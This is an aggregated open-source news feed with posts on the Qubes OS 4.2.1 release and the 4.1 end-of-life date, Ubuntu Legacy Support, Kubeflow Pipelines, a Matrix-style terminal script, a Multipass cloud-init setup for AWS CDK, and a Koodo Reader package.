<p><a href="https://ubuntu.com/engage/mongodb-for-enterprises">Webinar: MongoDB</a><a href="https://ubuntu.com/engage/mongodb-enterprise-data-management">®</a><a href="https://ubuntu.com/engage/mongodb-for-enterprises"> for Modern Data Management</a></p>
<p><a href="https://ubuntu.com/engage/mongodb-support-security">Whitepaper: MongoDB® Security and Support</a></p>
<p><a href="https://ubuntu.com/engage/mongodb-enterprise-data-management">Whitepaper: MongoDB® for enterprise data management</a></p>
<p><a href="https://assets.ubuntu.com/v1/eb8bfa49-Managed%20MongoDB_DS%20(1)-1.pdf">Learn more about Charmed MongoDB Managed Service</a></p>
<p><a href="https://assets.ubuntu.com/v1/4220f815-Data%20Solutions%20Advisory%20version%20_updated%20-%20v3-2.pdf">Learn more about Data Solutions Advisory at Canonical</a></p>
<p><strong><br />Trademark Notice</strong><br /><br />“MongoDB” is a trademark or registered trademark of MongoDB Inc. Other trademarks are property of their respective owners. Charmed MongoDB is not sponsored, endorsed, or affiliated with MongoDB, Inc.</p>Ubuntu developershttp://planet.ubuntu.com/Qubes OS 4.2.1 has been released!https://www.qubes-os.org/news/2024/03/26/qubes-os-4-2-1-has-been-released/2024-03-26T00:00:00+00:00<p>We’re pleased to announce the stable release of Qubes OS 4.2.1! This <a href="https://www.qubes-os.org/feed.xml#what-is-a-patch-release">patch release</a> aims to consolidate all the security patches, bug fixes, and other updates that have occurred since the release of Qubes 4.2.0. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO. The ISO and associated <a href="https://www.qubes-os.org/security/verifying-signatures/">verification files</a> are available on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page.</p>
<h2 id="whats-new-in-qubes-os-421">What’s new in Qubes OS 4.2.1?</h2>
<p>Qubes 4.2.1 includes numerous updates over the initial 4.2.0 release, in particular:</p>
<ul>
<li>All 4.2 dom0 updates to date</li>
<li>Fedora 39 template</li>
<li>Linux 6.6.x as the default kernel, significantly reducing the need for <code class="language-plaintext highlighter-rouge">kernel-latest</code> on newer systems</li>
</ul>
<p>For more information about the changes included in this version, see the <a href="https://github.com/QubesOS/qubes-issues/issues?q=is%3Aissue+is%3Aclosed+reason%3Acompleted+closed%3A2023-12-18..2024-03-14+-label%3A%22R%3A+cannot+reproduce%22+-label%3A%22R%3A+declined%22+-label%3A%22R%3A+duplicate%22+-label%3A%22R%3A+not+applicable%22+-label%3A%22R%3A+self-closed%22+-label%3A%22R%3A+upstream+issue%22+">full list of issues completed since the release of 4.2.0</a>.</p>
<h2 id="how-to-get-qubes-os-421">How to get Qubes OS 4.2.1</h2>
<p>You have a few different options, depending on your situation:</p>
<ul>
<li>
<p>If you’d like to install Qubes OS for the first time or perform a clean reinstallation on an existing system, there’s never been a better time to do so! Simply <a href="https://www.qubes-os.org/downloads/">download</a> the Qubes 4.2.1 ISO and follow our <a href="https://www.qubes-os.org/doc/installation-guide/">installation guide</a>.</p>
</li>
<li>
<p>If you’re currently on Qubes 4.1, learn <a href="https://www.qubes-os.org/doc/upgrade/4.2/">how to upgrade to Qubes 4.2</a>.</p>
</li>
<li>
<p>If you’re currently on Qubes 4.2 (including 4.2.0 and 4.2.1-rc1), <a href="https://www.qubes-os.org/doc/how-to-update/">update normally</a> (which includes <a href="https://www.qubes-os.org/doc/how-to-update/#upgrading-to-avoid-eol">upgrading any EOL templates</a> you might have) in order to make your system essentially equivalent to the stable Qubes 4.2.1 release. No reinstallation or other special action is required.</p>
</li>
</ul>
<p>In all cases, we strongly recommend <a href="https://www.qubes-os.org/doc/how-to-back-up-restore-and-migrate/">making a full backup</a> beforehand.</p>
<h2 id="reminder-new-signing-key-for-qubes-os-42">Reminder: new signing key for Qubes OS 4.2</h2>
<p>As a reminder, we published the following special announcement in <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">Qubes Canary 032</a> on 2022-09-14:</p>
<blockquote>
<p>We plan to create a new Release Signing Key (RSK) for Qubes OS 4.2. Normally, we have only one RSK for each major release. However, for the 4.2 release, we will be using Qubes Builder version 2, which is a complete rewrite of the Qubes Builder. Out of an abundance of caution, we would like to isolate the build processes of the current stable 4.1 release and the upcoming 4.2 release from each other at the cryptographic level in order to minimize the risk of a vulnerability in one affecting the other. We are including this notice as a canary special announcement since introducing a new RSK for a minor release is an exception to our usual RSK management policy.</p>
</blockquote>
<p>As always, we encourage you to <a href="https://www.qubes-os.org/security/pack/#how-to-obtain-and-authenticate">authenticate</a> this canary by <a href="https://www.qubes-os.org/security/verifying-signatures/">verifying its PGP signatures</a>. Specific instructions are also included in the <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">canary announcement</a>.</p>
<p>As with all Qubes signing keys, we also encourage you to <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-release-signing-keys">authenticate</a> the new Qubes OS Release 4.2 Signing Key, which is available in the <a href="https://www.qubes-os.org/security/pack/">Qubes Security Pack (qubes-secpack)</a> as well as on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page.</p>
<h2 id="what-is-a-patch-release">What is a patch release?</h2>
<p>The Qubes OS Project uses the <a href="https://semver.org/">semantic versioning</a> standard. Version numbers are written as <code class="language-plaintext highlighter-rouge"><major>.<minor>.<patch></code>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.2) inclusive of all updates up to a certain point. (See <a href="https://www.qubes-os.org/doc/supported-releases/">supported releases</a> for a comprehensive list of major and minor releases.) Installing the initial Qubes 4.2.0 release and fully <a href="https://www.qubes-os.org/doc/how-to-update/">updating</a> it results in essentially the same system as installing Qubes 4.2.1. You can learn more about how Qubes release versioning works in the <a href="https://www.qubes-os.org/doc/version-scheme/">version scheme</a> documentation.</p>Qubeshttps://www.qubes-os.org/Qubes OS 4.1 reaches EOL on 2024-06-18https://www.qubes-os.org/news/2024/03/26/qubes-os-4-1-reaches-eol-on-2024-06-18/2024-03-26T00:00:00+00:00<p>Qubes OS 4.1 is scheduled to reach <a href="https://www.qubes-os.org/feed.xml#what-does-end-of-life-eol-mean">end-of-life (EOL)</a> on 2024-06-18, approximately three months from the date of this announcement.</p>
<h2 id="recommended-actions">Recommended actions</h2>
<p>If you’re already using Qubes 4.2, then you don’t have to do anything. This announcement doesn’t affect you.</p>
<p>If you’re still using Qubes 4.1, then now is the perfect opportunity to upgrade, since a brand new <a href="https://www.qubes-os.org/news/2024/03/26/qubes-os-4-2-1-has-been-released/">Qubes OS 4.2.1 ISO was just released today</a>! (This is also the best way to get started with Qubes if you don’t have it installed yet.)</p>
<p>If you’d prefer not to reinstall, you can instead perform an <a href="https://www.qubes-os.org/doc/upgrade/4.2/#in-place-upgrade">in-place upgrade from Qubes 4.1 to 4.2</a>.</p>
<p>Whichever option you choose, we strongly recommend <a href="https://www.qubes-os.org/doc/how-to-back-up-restore-and-migrate/">making a full backup</a> beforehand and ensuring you’re on Qubes 4.2 by 2024-06-18.</p>
<h2 id="what-does-end-of-life-eol-mean">What does end-of-life (EOL) mean?</h2>
<p>When a Qubes OS release reaches end-of-life (EOL), it is no longer supported. This means that bugs discovered in that release will no longer be fixed, and enhancements will no longer be added. Most importantly, releases that have reached EOL no longer receive security updates, which is why it’s critically important to upgrade to a supported release.</p>
<h2 id="what-about-patch-releases">What about patch releases?</h2>
<p>The Qubes OS Project uses the <a href="https://semver.org/">semantic versioning</a> standard. Version numbers are written as <code class="language-plaintext highlighter-rouge"><major>.<minor>.<patch></code>. When a major or minor release reaches EOL, all of its patch releases also reach EOL. For example, in this case, when we say that “Qubes 4.1” (without specifying a <code class="language-plaintext highlighter-rouge"><patch></code> number) is approaching EOL, we’re specifying a particular minor release, inclusive of all patch releases within it. This means that Qubes 4.1.0, 4.1.1, and 4.1.2 will all reach EOL at the same time (on 2024-06-18), since they are all just patch releases of the same minor release.</p>
<h2 id="how-are-eol-dates-determined">How are EOL dates determined?</h2>
<p>According to our <a href="https://www.qubes-os.org/doc/supported-releases/">support policy</a>, stable Qubes OS releases are supported for six months after each subsequent <a href="https://www.qubes-os.org/doc/version-scheme/">major or minor release</a>. This means that Qubes 4.1 reaches EOL six months after Qubes 4.2 was released. Since Qubes 4.2.0 was <a href="https://www.qubes-os.org/news/2023/12/18/qubes-os-4-2-0-has-been-released/">released on 2023-12-18</a>, Qubes 4.1’s EOL date is six months later, on 2024-06-18.</p>Qubeshttps://www.qubes-os.org/The Fridge: Ubuntu Weekly Newsletter Issue 832https://fridge.ubuntu.com/?p=101192024-03-25T22:04:59+00:00<figure class="wp-block-image"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2020/02/c9d7/header.png" /></figure>
<p>Welcome to the Ubuntu Weekly Newsletter, <strong>Issue 832 for the week of March 17 – 23, 2024</strong>. The full version of this issue is available <a href="https://discourse.ubuntu.com/t/ubuntu-weekly-newsletter-issue-832/43450">here</a>.</p>
<p>In this issue we cover:</p>
<ul><li>Ubuntu Stats</li><li>Hot in Support</li><li>FLISoL San José de Pare – El primer FLISoL del año en Colombia</li><li>LoCo Events</li><li>March 8, Women’s Day – Marzo 8, Día Internacional de la Mujer – Bogotá, Colombia</li><li>Ubuntu Studio: Wallpaper Competition Winners 24.04 LTS</li><li>Ubuntu Cloud News</li><li>Canonical News</li><li>In the Blogosphere</li><li>Other Articles of Interest</li><li>Featured Audio and Video</li><li>Meeting Reports</li><li>Upcoming Meetings and Events</li><li>Updates and Security for Ubuntu 20.04, 22.04, and 23.10</li><li>And much more!</li></ul>
<p><strong>The Ubuntu Weekly Newsletter is brought to you by:</strong></p>
<ul><li>Krytarik Raido</li><li>Bashing-om</li><li>Chris Guiver</li><li>Wild Man</li><li>And many others</li></ul>
<p>If you have a story idea for the Weekly Newsletter, join the <a href="https://lists.ubuntu.com/mailman/listinfo/Ubuntu-news-team">Ubuntu News Team mailing list</a> and submit it. Ideas can also be added to the <a href="https://wiki.ubuntu.com/UbuntuWeeklyNewsletter/Ideas">wiki</a>!</p>
<div class="wp-block-image"><figure class="alignleft"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2015/05/ab28/CCL.png" /></figure></div>
<p><a href="https://fridge.ubuntu.com/2024/03/25/ubuntu-weekly-newsletter-issue-832/"></a>.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical expands Long Term Support to 12 years starting with Ubuntu 14.04 LTShttps://ubuntu.com//blog/canonical-expands-long-term-support-to-12-years-starting-with-ubuntu-14-04-lts2024-03-25T15:59:23+00:00<p>Today, Canonical announced the general availability of Legacy Support, an Ubuntu Pro add-on that expands security and support coverage for Ubuntu LTS releases to 12 years. The add-on will be available for Ubuntu 14.04 LTS onwards. </p>
<p>Long term supported Ubuntu releases get five years of standard security maintenance on the main Ubuntu repository. Ubuntu Pro expands that commitment to 10 years on both the main and universe repositories, providing enterprises and end users alike access to a vast secure open source software library. The subscription also comes with a phone and ticket support tier. Ubuntu Pro paying customers can purchase an extra two years of security maintenance and support with the new Legacy Support add-on. </p>
<p>“We’re thrilled to offer our customers additional years of security maintenance and support for Ubuntu LTS releases”, said Maximilian Morgan, Global VP of Support Engineering at Canonical. “Drawing on 20 years of excellence in open source, Canonical delivers expert security maintenance and support for customers around the world. With Legacy Support, we empower organisations to navigate their operational needs and investments into open source with confidence, ensuring their systems remain available, secure, and supported for many years to come”. </p>
<h2 class="wp-block-heading">Ideal for stability and peace of mind</h2>
<p>Running the latest operating system (OS) offers new features and enhanced performance, which is a good choice for new deployments. However, for large, established production systems, the transition to a new OS version presents a challenge as it may involve updating the entire software stack running on top of it. This complexity is amplified by modern software architectures that incorporate containerisation, microservices, extensive data management features, as well as integration with third-party APIs. </p>
<p>Given these multifaceted challenges, ensuring the system remains operational, secure, and supported is paramount. Organisations looking to gain peace of mind and stability while they plan and execute their migration strategy can trust Canonical.</p>
<h2 class="wp-block-heading">12 years of timely security fixes and support</h2>
<p>Security maintenance is part of a continuous process that proactively protects systems. It includes regular vulnerability scanning, evaluation and patch management. With Ubuntu Pro, Canonical provides continuous vulnerability management for critical, high and medium Common Vulnerabilities and Exposures (CVEs) across all software packages shipped with Ubuntu. Canonical’s security team actively backports these crucial fixes to all supported Ubuntu LTS releases, giving enterprises and end users peace of mind to keep their systems secure without requiring a major upgrade.</p>
<p>Support is a user-triggered service that comes into play when incidents occur or additional expertise is required to address complex issues. Customers looking to strengthen their business continuity strategy with open source expertise can rely on Canonical support for troubleshooting, break fixes, bug fixes and guidance.</p>
<h2 class="wp-block-heading">Available for Ubuntu 14.04 LTS Trusty Tahr and future LTS releases</h2>
<p>Ubuntu Pro coverage for Ubuntu 14.04 LTS will end in April 2024. With Legacy Support, organisations running their systems on top of Ubuntu 14.04 LTS can obtain an additional two years of expanded security maintenance and phone and ticket support. This enables IT managers to prepare a detailed upgrade plan for the next LTS, and software architects to concentrate on the application level with the support offered by Canonical’s team.</p>
<p>Learn more about Ubuntu Pro and the Legacy Support add-on at <a href="https://ubuntu.com/pro">https://ubuntu.com/pro</a>, <a href="https://ubuntu.com/support">https://ubuntu.com/support</a> or <a href="https://ubuntu.com/support/contact-us?product=support-overview">contact Canonical </a> for more information.</p>Ubuntu developershttp://planet.ubuntu.com/(中文) 干货满满!2024年3月WHLUG圆满结束,主题分享精彩回顾!https://www.deepin.org/?p=334032024-03-25T08:54:27+00:00Sorry, this entry is only available in 中文.aidahttps://www.deepin.org/enUbuntu Blog: A deep dive into Kubeflow pipelineshttps://ubuntu.com//blog/deep-dive-kubeflow-pipelines2024-03-25T06:01:24+00:00<p>Widely adopted by both developers and organisations, Kubeflow is an MLOps platform that runs on Kubernetes and automates machine learning (ML) workloads. It covers the entire ML lifecycle, enabling data scientists and machine learning engineers to develop and deploy ML models. Kubeflow is designed as a suite of leading open source projects that enable different capabilities such as model serving, training or hypertuning optimisations.</p>
<p>At Canonical, we deliver <a href="https://charmed-kubeflow.io/">Charmed Kubeflow</a> – an official distribution of the upstream solution with additional security maintenance, tool integrations, and enterprise support and managed services – so we know a thing or two about the project. In our experience, one of the most important concepts to understand with respect to both Kubeflow itself and the broader ML lifecycle is machine learning pipelines. Taking advantage of pipelines is the best way to effectively deploy models at scale in production, so let’s break down this critical component in the MLOps landscape.</p>
<h1 class="wp-block-heading">What is an ML pipeline?</h1>
<p>A machine learning pipeline is an important component of ML systems, ensuring simplified experimentation and capability to take models to production. They are a series of steps that automate how ML models are created, in order to streamline the workflow,development and deployment. ML pipelines simplify the complexity of the end-to-end ML lifecycle, helping professionals to develop and deploy models. Amongst their benefits, ML pipelines ensure scalability thanks to their ability to handle large volumes of data while supporting collaboration and reproducibility.</p>
<p>A core value of MLOps platforms such as Kubeflow is that they enable professionals to build and maintain ML pipelines.</p>
<h1 class="wp-block-heading">What is Kubeflow Pipelines?</h1>
<p>Kubeflow Pipelines or KFP is the heart of Kubeflow. It is a Kubeflow component that enables the creation of ML pipelines. It is used to help you build and deploy container-based ML workflows that are portable and scalable. The main goals of Kubeflow Pipelines are to simplify the following processes:</p>
<ul>
<li>Orchestration of the end-to-end ML pipelines</li>
<li>Experimentation with various ideas and techniques</li>
<li>Experiment management </li>
<li>Reuse of components and pipelines to enable users to quickly put together end-to-end solutions without having to re-build each time</li>
</ul>
<h3 class="wp-block-heading">Components of Kubeflow Pipelines</h3>
<p>Kubeflow Pipelines is part of the Kubeflow project. It can be used as part of the project or as an independent tool. It is made of 3 main components:</p>
<ul>
<li>User interface (UI) for managing and tracking experiments, jobs, and runs</li>
<li>Engine for scheduling multi-step ML workflows</li>
<li>SDK for defining and manipulating pipelines and components</li>
</ul>
<h1 class="wp-block-heading">Kubeflow Pipelines use cases</h1>
<p>Kubeflow Pipelines is typically most useful for advanced users of Kubeflow or professionals who already have experience with machine learning. You don’t necessarily need KFP in the experimentation phase of the ML journey, but it becomes useful when you want to take yourmodels to production. The main use cases for KFP include:</p>
<ul>
<li><strong>Workflow automation: </strong>Data scientists and machine learning engineers often perform a lot of the initial experimentation phase manually to better understand optimisation possibilities and quickly iterate. But once they have defined their workflow, they can use KFP to automate the process and save time.</li>
<li><strong>Model deployment to production: </strong>Models are usually compiled in a binary file. Traditionally, for the model to be loaded to a server where the requirements for inference are met, this file would be manually copied to the machine that hosts the application. KFP simplifies this process by enabling you to build automated pipelines to multiple applications or servers.</li>
<li><strong>Model maintenance and updates: </strong>The ML lifecycle is an iterative process and models need to be updated periodically. KFP helps users run updates and rollbacks across multiple applications or servers. Once the model is updated in one place and the update transaction is complete, KFP ensures the update is quickly applied to all client applications. </li>
<li><strong>Multi-tenant ML environment: </strong>Organisations often have large data and ML teams that need to share their resources. KFP enables simple and effective sharing of the environment, where each collaborator gets an isolated environment. It is then utilised by the K8s cluster and tools such as <a href="https://volcano.sh/en/">Volcano</a> to schedule resources or manage containers. This helps professionals isolate workflows and keep track of pending and running jobs for each collaborator.<strong> </strong></li>
</ul>
<h1 class="wp-block-heading">Benefits of KFP</h1>
<p>Among machine learning specialists, Kubeflow Pipelines is widely adopted for a number of reasons. The most important benefits of KFP include:</p>
<ul>
<li><strong>Streamlined workflow automation: </strong>Kubeflow Pipelines allows users to define the machine learning pipelines as a sequence of steps, each with its input, output, and dependencies. This leads to streamlining the machine learning workflows, and reduces the overhead and complexity of managing and executing your pipelines.</li>
<li><strong>Improved collaboration: </strong>Kubeflow Pipelines provides a central and shared platform for data scientists, machine learning engineers, and IT operations teams to collaborate on machine learning projects. It allows them to share pipelines and artifacts with others, and enables the tracking and monitoring of the pipelines across the entire organisation.</li>
<li><strong>Enhanced performance and scalability</strong>: Kubeflow Pipelines runs on Kubernetes, which provides a scalable and flexible infrastructure for running machine learning pipelines and models. This allows you to easily scale up and down the pipelines, and ensure that your pipelines are performant and reliable.</li>
<li><strong>Resource optimisation: </strong>KFP is a cloud native application, so it can leverage the resource schedulers that Kubernetes platforms provide. This leads to optimised usage of the existing resources and faster project delivery.</li>
<li><strong>Extensive support for popular machine learning frameworks: </strong>KFP provides built-in support for popular machine learning frameworks like TensorFlow, PyTorch, and XGBoost, as well as a rich ecosystem of integrations and plugins for other tools and services. Charmed Kubeflow goes a step further and enables additional integrations with tools and frameworks such as NVIDIA NGC Containers, Triton Inference Server and MLflow.</li>
</ul>
<p>Whereas Kubeflow Pipelines is a feature-rich tool, it still raises some challenges for beginners. It comes with a steep learning curve and there is limited documentation available. Since it is a fully open source tool, there is a big community that can help beginners, but it can be frustrating at times. You can alleviate these challenges by taking advantage of enterprise support or managed services from organisations which distribute Kubeflow.</p>
<h1 class="wp-block-heading">Architecture of Kubeflow Pipelines</h1>
<p>Kubeflow Pipelines is a complex component with capabilities that unblock users and enable them to automate their workflows and reduce their time spent on manual tasks. The following architecture depicts these capabilities: </p>
<p class="has-text-align-center">
</p><div class="lazyload">
<noscript>
<img alt="" height="631" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_624,h_631/https://lh7-us.googleusercontent.com/yaQetfLIWcA6IyckPfMzNgnYGHag1A3iKxncQV-Iziq768cvFJ3ezjg6uZZ9oiaZsXzEFBF5g55WUM_nfaX0lVAqrM07Z3Yy3TAfwXzGePpfCMdflzxa9T3kGS8XpvCJVDZIeBFc-VLV4uR1-eYPWVQ" width="624" />
</noscript>
</div>
<p></p>
<p class="has-text-align-center"><a href="https://ubuntu.com/blog/Kubeflow community" rel="noreferrer noopener" target="_blank">source: Kubeflow community</a></p>
<p>As the diagram illustrates, users can interact with KFP either through the user interface or through development tools such as Notebooks. Initially, users create components or specify a pipeline using the Kubeflow Pipelines domain-specific language (<a href="https://github.com/kubeflow/pipelines/tree/sdk/release-1.8/sdk/python/kfp/dsl">DSL</a>). Once defined, the compiler transforms the Python code into a YAML static configuration. Then, the Pipeline Service creates a pipeline run from the static configuration. It calls the server of Kubernetes API for creating the necessary Kubernetes resources (<a href="https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/">CRDs</a>) to run the pipeline. If you have a resource scheduler integrated, you can use it to run the pipeline when resources are available or at a desired time. To complete the pipeline, the containers are executed within the Kubernetes pods, using orchestration controllers.</p>
<p>Two types of data can be stored. The first type is metadata, which includes experiments, jobs, pipeline runs, and single scalar metrics. The second type is artefacts, which includes pipeline packages, views, and large-scale metrics (time series). Metadata is stored in a MySQL database, whereas artefacts are stored within MinIO. Storing them in an external component also enables portability, so artefacts can be migrated to different clusters or environments.</p>
<p>Kubernetes resources created by the Pipeline Service are monitored by the Persistence Agent. To enable reproducibility, the input and output of the containers are recorded. It enables professionals to use the configurations and replicates different tasks, also being able to check if the results match. They consist of parameters or data artefact URIs and are seen as metadata.</p>
<p>The Pipeline web server enables users to get a visual understanding of the steps from the Kubeflow Pipelines. It presents various information, including list of pipelines currently running, history of pipeline execution, data artefacts and logs for debugging.</p>
<h1 class="wp-block-heading">Get started with Kubeflow Pipelines</h1>
<p>In order to access Kubefow Pipelines, users can either deploy them independently or as part of the Kubeflow project. For simplified deployment, we recommend using Charmed Kubeflow.</p>
<ol>
<li>Deploy Charmed Kubeflow following the <a href="https://charmed-kubeflow.io/docs/get-started-with-charmed-kubeflow">tutorial</a>. You can do it on any environment, including public cloud or on-prem. Ensure that you have enough resources available, so you do not bump into problems along the way</li>
<li>Access the Kubeflow dashboard. In case you are accessing it from a VM or from a public cloud, please ensure that you <a href="https://charmed-kubeflow.io/docs/how-tosetup-ssh-vm-access-with-port-forwarding">change the SOCKs proxy settings.</a> There you will have different options, including to upload an existing pipeline or create a new one.</li>
<li>Clone this repository from <a href="https://github.com/canonical/kubeflow-examples/tree/main/e2e-wine-kfp-mlflow">Github</a> which contains a simple example of how to use some of the components of Kubeflow </li>
<li>Access the examples from the Notebook. There are several pipelines created which you can run, edit or play with. Of course, they are just examples. In order to build your own pipeline, check the official documentation of the Kubeflow project.</li>
</ol>
<h3 class="wp-block-heading">Further reading</h3>
<p><a href="https://ubuntu.com/blog/kubeflow-vs-mlflow">Kubeflow vs MLflow</a></p>
<p><a href="https://charmed-kubeflow.io/docs/launch-ngc-notebooks">Launch NGC containers with Kubeflow</a></p>
<p><a href="https://ubuntu.com/blog/mlops-pipeline-with-mlflow-seldon-core-and-kubeflow-pipelines">MLOps pipelines with Kubefow, MLflow and Seldon</a></p>Ubuntu developershttp://planet.ubuntu.com/Stuart Langridge: The Matrix has you, part 2tag:www.kryogenix.org,2024-03-24:/days/2024/03/24/the-matrix-has-you-part-2/2024-03-24T15:40:00+00:00<p>I’ve recently <a href="https://mastodon.social/@sil/112144967827317228">switched back from vscode to Sublime Text</a>, which means that after all the time I spent training my fingers to type “<code>code somefile.txt</code>” instead of “<code>subl somefile.txt</code>” I now need to undo all that conditioning and go back to <code>subl</code> again. So I thought, hey, maybe I should dump a little shell script called <code>code</code> in my <code>bin</code> folder which admonished me in some amusing way, thus Pavlov-ing myself into learning to do it right.</p>
<p>And then I thought, hey, what’d be cool is if I had that Matrix-esque “raining code” effect in the Terminal and then it was superimposed with a box saying “<span class="caps">STOP</span> <span class="caps">TYPING</span> code <span class="caps">AND</span> <span class="caps">USE</span> subl <span class="caps">INSTEAD</span>”, like the “<span class="caps">SYSTEM</span> <span class="caps">ERROR</span>” message at the end of the first movie.</p>
<p>And then I thought: someone’s already done this, right? And they have; it is called <a href="https://github.com/abishekvashok/cmatrix"><code>cmatrix</code></a>. But I don’t like cmatrix because it doesn’t do the colours right; the text just sorta stops rather than fading away like the movie does, and it feels unreal and too sharp for me. Now, don’t get me wrong, I understand why this is; terminals support a full proper range of colour these days, but writing a program which gets released to actual people and which can deal with the bewildering array of terminal settings out there is a miserable waste of everyone’s time. But I’m not writing this for anyone else; it only has to work in <em>my</em> terminal (in true <a href="https://www.kryogenix.org/days/2007/03/18/works-on-my-machine/">works on my machine</a> fashion). And this will give me a chance to noodle about with Python terminal libraries such as <a href="https://pypi.org/project/blessed/">blessed</a> to make something interesting. Hence, <a href="https://kryogenix.org/random/matrix24.py">matrix24.py</a>:</p>
<video controls="controls" src="https://kryogenix.org/random/matrix-24bit.mp4"></video>
<p>It’s a bodge all round, and it still doesn’t look right, and <a href="http://jessica.tech/">Jess</a> pointed out that making something cool happen when I make a mistake is the opposite of conditioning, but I got to fiddle about with a new library for a bit, so that was fun. Can I do something productive now?</p>
<p>(title from <a href="https://www.kryogenix.org/days/2003/06/18/mtrx/">a classic post about the Matrix</a> which still makes me laugh even after all these years, although it is very unfair to Keanu Reeves who is a cool bloke and should be emulated in his approach to life)</p>Ubuntu developershttp://planet.ubuntu.com/Dougie Richardson: Multipass cloud-inithttps://dougiewougie.com/?p=27212024-03-24T13:30:47+00:00<p><a href="https://multipass.run/">Multipass</a> is pretty useful but what a pain this was to figure out, due to Ubuntu’s Node.js package not working with AWS-CDK.</p>
<p>Multipass lets you manage VM in Ubuntu and <a href="https://ubuntu.com/blog/using-cloud-init-with-multipass">can take cloud-init</a> scripts as a parameter. I wanted an Ubuntu LTS instance with AWS CDK, which needs <code>Node.js</code> and <code>python3-venv</code>.</p>
<pre class="wp-block-code"><code class="language-yaml line-numbers" lang="yaml">#cloud-config
packages:
- python3-venv
- unzip
package_update: true
package_upgrade: true
write_files:
- path: "/etc/environment"
append: true
content: |
export PATH=\
/opt/node-v20.11.1-linux-x64/bin:\
/usr/local/sbin:/usr/local/bin:\
/usr/sbin:/usr/bin:/sbin:/bin:\
/usr/games:/usr/local/games:\
/snap/bin
runcmd:
- wget https://nodejs.org/dist/v20.11.1/node-v20.11.1-linux-x64.tar.xz
- tar xvf node-v20.11.1-linux-x64.tar.xz -C /opt
- export PATH=/opt/node-v20.11.1-linux-x64/bin:$PATH
- npm install -g npm@latest
- npm install -g aws-cdk
- git config --system user.name "Dougie Richardson"
- git config --system user.email "xx@xxxxxxxxx.com"
- git config --system init.defaultBranch main
- wget https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
- unzip awscli-exe-linux-x86_64.zip
- ./aws/install</code></pre>
<p>Save that as cdk.yaml and spin up an new instance:</p>
<pre class="wp-block-code"><code class="language-bash" lang="bash">multipass launch --name cdk --cloud-init cdk.yaml</code></pre>
<figure class="wp-block-image size-full"><img alt="Success!" class="wp-image-2723" height="200" src="https://dougiewougie.com/wp-content/uploads/2024/03/Screenshot-from-2024-03-24-12-44-52-e1711284497926.png" width="478" /></figure>
<p>There’s a couple useful things to note if you’re checking this out:</p>
<ul>
<li>Inside the VM there’s a useful log to assist debugging <code>/var/log/cloud-init-output.log</code>.</li>
<li>While YAML has lots of ways to split text over multiple lines, when you don’t want space use a backslash.</li>
</ul>
<p>Shell into the new VM with <code>multipass shell cdk</code>, then we can configure programmatic access and bootstrap CDK.</p>
<pre class="wp-block-code"><code class="language-bash" lang="bash">aws sso configure
aws sso login --profile profile_name
aws sts get-caller-identity --profile profile_name
aws configure get region --profile profile_name</code></pre>
<p>The last two commands give the account and region to bootstrap:</p>
<pre class="wp-block-code"><code class="language-bash" lang="bash">cdk bootstrap aws://account_number/region --profile profile_name</code></pre>Ubuntu developershttp://planet.ubuntu.com/Koodo Readerhttps://sparkylinux.org/?p=124242024-03-24T11:49:13+00:00<p><img alt="koodo reader" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" height="210" src="https://sparkylinux.org/wp-content/uploads/2024/03/koodo.webp" width="350" /></p><p>There is a new application available for Sparkers: Koodo Reader</p>
<p><strong>What is Koodo Reader?</strong></p>
<blockquote><p>A modern ebook manager and reader with sync and backup capacities for Windows, macOS, Linux and Web. It’s free and open-source.
</p></blockquote>
<p><strong>Features</strong></p>
<p>– Format support: EPUB (.epub), PDF (.pdf), DRM-free Mobipocket (.mobi) and Kindle (.azw3, .azw), Plain text (.txt), FictionBook (.fb2), Comic book archive (.cbr, .cbz, .cbt, .cb7), Rich text (.md, .docx), Hyper Text (.html, .xml, .xhtml, .mhtml, .htm, .htm)<br />
– Platform support: Windows, macOS, Linux and Web<br />
– Save your data to OneDrive, Google Drive, Dropbox, FTP, SFTP, WebDAV, S3, S3 Compatible<br />
– Customize the source folder and synchronize among multiple devices using OneDrive, iCloud, Dropbox, etc.<br />
– Single-column, two-column, or continuous scrolling layouts<br />
– Text-to-speech, translation, dictionary, touch screen support, batch import<br />
– Add bookmarks, notes, highlights to your books<br />
– Adjust font size, font family, line-spacing, paragraph spacing, background color, text color, margins, and brightness<br />
– Night mode and theme color<br />
– Text highlight, underline, boldness, italics and shadow</p>
<p><strong>Installation (Sparky 7 & 8 amd64, arm64, i386):</strong></p>
<p><code>sudo apt update<br />
sudo apt install koodo-reader</code></p>
<p>License: GNU AGPL 3.0<br />
Web: github.com/koodo-reader/koodo-reader<br />
<br /> </p>
<div class="simplesocialbuttons simplesocial-flat-button-border simplesocialbuttons_inline simplesocialbuttons-align-left post-12424 post simplesocialbuttons-inline-no-animation">
<button class="simplesocial-fb-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Facebook </span> </button>
<button class="simplesocial-twt-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Twitter</span> </button>
<button class="simplesocial-reddit-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Reddit</span> </button>
<button class="simplesocial-tumblr-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Tumblr</span> </button>
</div>pavroohttps://sparkylinux.orgVyOS Project March 2024 Updatehttps://blog.vyos.io/vyos-project-march-2024-update2024-03-22T17:08:46+00:00<div class="hs-featured-image-wrapper">
<a class="hs-featured-image-link" href="https://blog.vyos.io/vyos-project-march-2024-update" title=""> <img alt="march 2024 update" class="hs-featured-image" src="https://blog.vyos.io/hubfs/VyOS%20Project%20march%202024.png" style="width: auto !important; float: left; margin: 0 15px 15px 0;" /> </a>
</div>
